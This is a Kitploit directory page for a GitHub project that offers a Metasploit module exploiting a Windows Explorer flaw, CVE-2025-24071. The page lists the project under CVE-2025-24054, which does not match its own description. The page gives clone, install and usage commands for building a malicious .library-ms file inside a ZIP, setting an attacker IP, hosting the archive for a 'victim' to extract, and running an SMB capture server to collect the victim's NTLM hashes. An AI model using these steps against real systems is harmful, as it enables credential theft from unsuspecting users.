Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2025-24054 — POC for CVE-2025-24054 | Kitploit
Tools/GitHubGitHub/fomovet/cve-2025-24054
Penetration Testing FrameworksExploit FrameworksPayload GenerationVulnerability AnalysisExploitationCommand and Control
GitHubfomovet/cve-2025-24054

cve-2025-24054

POC for CVE-2025-24054

View Repository
2 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-24071: NTLM Hash Leak via .library-ms File (Metasploit Module)

This repository contains a Metasploit module to exploit CVE-2025-24071, a vulnerability in Windows Explorer that leaks NTLM hashes when a malicious .library-ms file is extracted from a ZIP archive.

Developed by: FOLKS-IWD


Overview

The vulnerability occurs when a user extracts a ZIP archive containing a specially crafted .library-ms file. Windows Explorer automatically initiates an SMB authentication request to a remote server specified in the file, leaking the user's NTLM hash without any user interaction.

This Metasploit module:

  1. Generates a malicious .library-ms file.
  2. Packs it into a ZIP archive.
  3. Integrates with Metasploit's SMB capture functionality to collect NTLM hashes. image

Installation

  1. Clone the repository:
    root@kitploit:~
    git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
    cd CVE-2025-24071-msfvenom
    
  2. Copy the module to your Metasploit modules directory:
    root@kitploit:~
    cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
    

Usage

  1. Load the module:
    root@kitploit:~
    use auxiliary/server/ntlm_hash_leak
    
  2. Set the required options:
    root@kitploit:~
    set ATTACKER_IP 192.168.1.162  # Replace with your IP address
    set FILENAME exploit.zip       # Name of the malicious ZIP file
    set LIBRARY_NAME malicious.library-ms  # Name of the .library-ms file
    set SHARE_NAME shared          # SMB share name
    
  3. Run the module :
root@kitploit:~
  run
  1. The module will generate a malicious ZIP file (exploit.zip). Host this file for the victim to download and extract.
  2. Use Metasploit's SMB capture module to collect NTLM hashes:
    root@kitploit:~
    use auxiliary/server/capture/smb
    set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
    run
    
Download Tool